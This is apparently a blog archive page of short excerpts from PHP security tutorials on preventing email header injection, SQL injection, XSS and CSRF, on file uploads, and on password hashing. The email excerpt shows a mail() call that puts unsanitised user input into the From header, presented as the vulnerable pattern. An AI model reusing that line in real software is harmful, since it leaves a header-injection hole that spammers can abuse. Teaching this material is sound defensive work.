Security

Preventing Email Injection in PHP

Security measures should be taken that will assist in preventing email injection in PHP. Notably of spam-related content into the email.
Emails in PHP often use the standard mail() function. This means that your code might look something like this:
mail(“support@somewebsite.com”, “Contact Form Reply”, $message, “From: $email” );
The code above sends the message to …

Preventing SQL Injection in PHP

SQL Injection is a method of an attacker altering SQL commands to expose, override data or execute dangerous commands. Preventing SQL injection in PHP can be achieved by following the steps in the post below.
Consider a simple form that contains a username and password field. Without sufficient security measures, the attacker could add the …

Preventing XSS in PHP

Cross Site Scripting (XSS) is one of the most common forms of security attacks that happens against websites. This article will show you simple methods of preventing XSS in PHP.
The attack focuses on injecting code which can happen if user input isn’t correctly sanitised or escaped when being output to the browser. This can …

Preventing CSRF in PHP

Preventing CSRF in PHP is fairly easy if known how to do so, however there are many websites that are vulnerable to this type of attack.
Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious site or email causes a user’s browser to perform an unwanted action on a …

File Uploads in PHP

File Uploads in PHP allow users to upload both text and binary files. With PHP’s authentication and file manipulation functions, you have full control over who is allowed to upload and what is to be done with the file once it has been uploaded.
First of all, you’ll need to check that your server’s file_uploads …

Zend PHP 5 – Security – Password Hashing API

When storing passwords, the golden rule is to not store them in plain text. PHP provides several functions to hash the passwords.
md5() and sha1()
Hashing algorithms such as MD5 and SHA1 are very fast and efficient. Unfortunately with modern computers, it has become trivial to “brute force” the output of these algorithms to determine …